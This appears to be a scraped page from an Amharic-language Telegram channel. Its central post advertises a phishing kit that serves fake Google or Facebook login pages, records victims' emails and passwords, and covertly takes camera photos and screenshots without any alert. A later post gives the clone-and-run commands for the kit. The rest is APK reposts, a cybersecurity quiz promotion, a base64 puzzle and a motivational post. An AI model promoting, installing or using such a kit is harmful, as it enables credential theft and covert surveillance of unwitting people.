ᶜⁱᵖʰᵉr ALL In One
75 subscribers
26 photos
3 videos
3 files
39 links
Download Telegram
ቤተሰብ channel ላይ warnning ላይ ሆኜ ነበር እና ዛሬ ተለቆልኛል:: እና በኔ በኩል አዳዲስ ነገር ሲኖር የማጋራችሁ ይሆናል

𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
አንድ project ልለቅ ነበር ግን ብዙ ሰው ያለው community ላይ እንጂ channel ላይ አይደለም
ስለዚህ አሁን channel ላይ 26 ሰዎች አሉ በቀላሉ share በ ማድረግ ትንሽ ሰው ስንጨምር አንድ tool እለቃለሁ
ይሄ tool የሚሰራው 👉 በ ዋናነት phishing site ነው ግን
1.camera hack አድርጎ ምስል ማንሳት📸
2.bash file ላይ ሁለት አማራጭ አሉት እሱም google እና facebook template ሲሆን ሁለቱን አንዱን መርጣችሁ ለ victim መላክ ነው
3.ሌላው keylog ነው ተጠቂ(victim)የሚያስገባውን email እና password ይመዘግብና ያስቀምጣል
4.screenshoot ምንም ሳያሳውቅ ያነሳል
🤔ምን ለየት ያደርገዋል
1.ሁሉንም phishing አይነቶች ባንድ አካቶ መያዙ 👌🏼
2.ሁሉንም ሲያኪያሂድ በ ቅፅበት ነው
3.እና ምንም አይነት ማሳዎቂያ እነሱ ጋር አይደርስም normal google ዎይም facebook የመረጣችሁት website ነው የሚታየው 🔕
4.cloudflared ዎይም ngrok እና ሌሎችም ዎደ public link ማድረጊያ አማራጭ አሉት
እና ሌላም ሌላም ይኖሩታል ታዲያ ይሄን ለማግኘት 👇👇👇
𝗷𝗼𝗶𝗻=>https://t.me/cipher_attacks
𝘀𝗵𝗮𝗿𝗲=>https://t.me/cipher_attacks
ለ ጓደኛችሁ Share በ ማድረግ ትብብርራችሁን አሳዩን
1👍5
ነገ የምለቅላችሁ ይሆናል 👍በ video ይሁን በ ፅሁፍ ምረጡ
Anonymous Poll
72%
በ video
28%
በ ፅሁፍ
Media is too big
VIEW IN TELEGRAM
በ ምርጫችሁ መሰረት በ video ሰርቼዋለሁ
እና ግልፅ ያልሆነ ያልገባችሁን ነገር በ comment ስር ፃፉት እመልሳለሁ

git clone https://github.com/cipher-attack/all_tools_in_one_with_PHISHING-.git 

```next go to directory
cd all_tools_in_one_with_PHISHING- ```
```run
./cipher_attack.sh`
ከዚህ በታች ያልገባችሁ ካለ comment ላይ
👍6
Forwarded from Termux (JØǤŁĬҜ)
APK_Editor_v2-Material-DarkMode-all-arm.apk
5.7 MB
Модифицированная версия Apk _Editor
Termux
APK_Editor_v2-Material-DarkMode-all-arm.apk
app edit ማድረጊያ ነው termux ያልኩአችሁ አይደለም እሱን ትንሽ ጠብቁኝ
me.zhanghai.android.files_39.apk
9.3 MB
me.zhanghai.android.files_39.apk
👍4
ᶜⁱᵖʰᵉr ALL In One
Photo
app ካወረዳችሁ በኃላ በዚህ መሰረት add አድርጋችሁ ተጠቀሙ
👍6
የሳይበር ደህንነት ግንዛቤዎን የሚፈትሹበት እና የሚሸለሙበት ውድድር እነሆ!!
• በየቀኑ የአምስት መቶ ብር ካርድ፤
• በየሳምንቱ የስማር ሰአት ሽልማት፤ እንዲሁም
• በጥቅምት ወር መጨረሻ የላፕቶፕ ሽልማት


6ተኛውን ሀገር አቀፍ የሳይበር ደህንነት ወር ምክንያት በማድረግ ሁሉንም የሕብረተሰብ ክፍል የሚያሳትፍና የሚያሸልም የሳይበር ደህንነት የጥያቄና መልስ ውድድር እንዲሁም የጌም ጨዋታ ከጥቅምት 1 እስከ 30/2018 ዓ/ም ድረስ ተዘጋጅቷል፡፡ እርስዎም ጥያቄዎችን በመመለስ እንዲሁም የቀረቡ ጌሞችን በመጫወት ተሸላሚ ይሁኑ!

በጥያቄና መልስ ውድድሩ ላይ ለመሳተፍ እንዲሁም የቀረቡ ጌሞችን ለመጫወትና ለመሸለም ከታች ያለውን QR Code ስካን ያድርጉ ወይም https://lottery.insa.gov.et/signup ይጠቀሙ፡፡

“የሳይበር ደህንነት - የዲጂታል ኢትዮጵያ መሰረት”
#6ተኛው_ሀገር_አቀፍ_የሳይበር_ደህንነት_ወር
ከጥቅምት 1 እስከ 30/2018 ዓ/ም
#የኢንፎርሜሽን_መረብ_ደህንነት_አስተዳደር
#insa #6_Cyber_Security_Month #Ethiopia #DigitalEthiopa #CyberSecurity
👍4
hallo decoders😁 please decode this with base 64

"YUhSMGNITTZMeTkwTG0xbEwyTnBjR2hsY2w5aGRIUmhZMnR6Q2c9PQo="

and share in comment the flag or something
👍4
ሰላም 👋
ዎገንታት የሰራሁትን web እስኪ ሾፍ ሾፍ አድርጉልኝ ደግሞ አብዛኛው neger ለ sample ነው ፅሁፉ ምናምን ይቀየርለታል ::

እኔ እንደራሴ ዎድጃታለሁ ግን እናንተስ ነው ጥያቄው

እስኪ ይችን ጠቅ አድርጋችሁ እዩልኝ 🫡

👉👉👉👉https://cipher-attack.xo.je 👈👈👈👈
👍5
level-easy
Question: which type of cyberattack encrypts a victm's file and demands a Ransome payment to restore access?
Anonymous Quiz
12%
SQL injection
68%
Ransomeware
12%
Phishing
8%
DDos Attack
አስማተኛው የባንክ አካውንት💰

አንድ የባንክ አካውንት አላችሁ እንበል ሁሌም ጠዋት ጠዋት 86,400 ብር ይገባበታል። እናም የቱንም ያህል ገንዘብ በየቀኑ መጠቀም ትችላላችሁ የተረፈው ወይም ሳትጠቀሙ ከዋላችሁ ሁሌም ባዶ እየሆነ ያድራል። ስለዚህ ምን ማድረግ አለባችሁ ሁሌም ማውጣት።

እጅግ የሚያስገርማችሁ ነገር ግን ይህ አካውንት ሁላችንም አለን!! ይህ አካውንታችን ጊዜ🕰 ነው ጠዋት ስንነሳ 86,400 ሰከንዶች ይኖሩናል... ምሽት ስንገባ ሁሉም ያልቃል!! ቀን በቀንም እየቀነሰ ይሄዳል እራሱን 0⃣ እያደረገ...
ሁሌም ጠዋት ስንነሳ ሙሉ ሆኖ እናገኘዋለን ምሽት ስንገባም ያልተጠቀምንበት ጊዜ ካለ እናጣዋለን... ከሰው መበደርም ሆነ መመለስ ፈፅሞ🚫 አንችልም።
እናም ጊዜህ ጊዜህ ነው‼️
ጊዜያችንን በአግባቡና በጥበብ መጠቀም አለብን ልክ እንደ አካውንቱ ሲመሽ ጥሪት ሳናፈራ ዜሮ ይሆናልና ነው።

🙌እኔ ትናንት ከትናንት ወዲያ የአካውንቴን ገንዘብ አጥቻለሁ እናንተስ ምን ያክሉን ተጠቀማችሁ?

                  
Gn
😢7